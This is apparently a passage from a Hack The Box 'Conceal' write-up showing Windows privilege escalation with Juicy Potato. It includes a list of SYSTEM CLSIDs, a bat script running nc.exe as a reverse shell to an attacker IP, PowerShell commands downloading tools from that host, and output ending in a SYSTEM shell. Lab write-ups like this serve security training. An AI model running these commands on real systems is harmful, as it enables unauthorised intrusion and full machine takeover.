{B91D5831-B1BD-4608-8198-D72E155020F7};NT AUTHORITY\SYSTEM
{97061DF1-33AA-4B30-9A92-647546D943F3};NT AUTHORITY\SYSTEM
{8BC3F05E-D86B-11D0-A075-00C04FB68820};NT AUTHORITY\SYSTEM
{C49E32C6-BC8B-11d2-85D4-00105A1F8304};NT AUTHORITY\SYSTEM
{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381};NT AUTHORITY\SYSTEM
{B52D54BB-4818-4EB9-AA80-F9EACD371DF8};NT AUTHORITY\SYSTEM
{E63DE750-3BD7-4BE5-9C84-6B4281988C44};NT AUTHORITY\SYSTEM
{E48EDA45-43C6-48e0-9323-A7B2067D9CD5};NT AUTHORITY\SYSTEM
{A9B5F443-FE02-4C19-859D-E9B5C5A1B6C6};NT AUTHORITY\SYSTEM
{7D096C5F-AC08-4F1F-BEB7-5C22C517CE39};NT AUTHORITY\SYSTEM
{30766BD2-EA1C-4F28-BF27-0B44E2F68DB7};NT AUTHORITY\SYSTEM
{9E175B6D-F52A-11D8-B9A5-505054503030};NT AUTHORITY\SYSTEM
{9E175B68-F52A-11D8-B9A5-505054503030};NT AUTHORITY\SYSTEM
{e60687f7-01a1-40aa-86ac-db1cbf673334};NT AUTHORITY\SYSTEM
{0134A8B2-3407-4B45-AD25-E9F7C92A80BC};NT AUTHORITY\SYSTEM
{5B3E6773-3A99-4A3D-8096-7765DD11785C};NT AUTHORITY\SYSTEM
{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM

We will make Juicy Potato execute a reverse shell with nc but since it doesn't accept arguments we can create the following bat script instead.

root@kali:~/htb/conceal# cat shell.bat 
@echo on
C:\Users\Public\nc.exe 10.10.16.38 6767 -e cmd.exe

Upload nc.exe binary and the bat script to the machine.

(New-Object System.Net.WebClient).DownloadFile("http://10.10.16.38/nc.exe","C:\Users\Public\nc.exe")
(New-Object System.Net.WebClient).DownloadFile("http://10.10.16.38/shell.bat","C:\Users\Public\shell.bat")

Now we can run Juicy Potato using as payload the bat script, in -c one CLSID from NT AUTHORITY\SYSTEM, -t * to try both CreateProcessWithTokenW and CreateProcessAsUser and in -l a random port to listen on.

PS C:\Users\Public> C:\Users\Public\JuicyPotato.exe -l 1337 -p C:\Users\Public\shell.bat -t * -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}"
Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337
......
[+] authresult 0
{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

If we're listening on the specified port we get a shell as nt authority\system.

root@kali:~/htb/conceal# nc -nlvp 6767
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::6767
Ncat: Listening on 0.0.0.0:6767
Ncat: Connection from 10.10.10.116.
Ncat: Connection from 10.10.10.116:50777.
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>type proof.txt
type proof.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX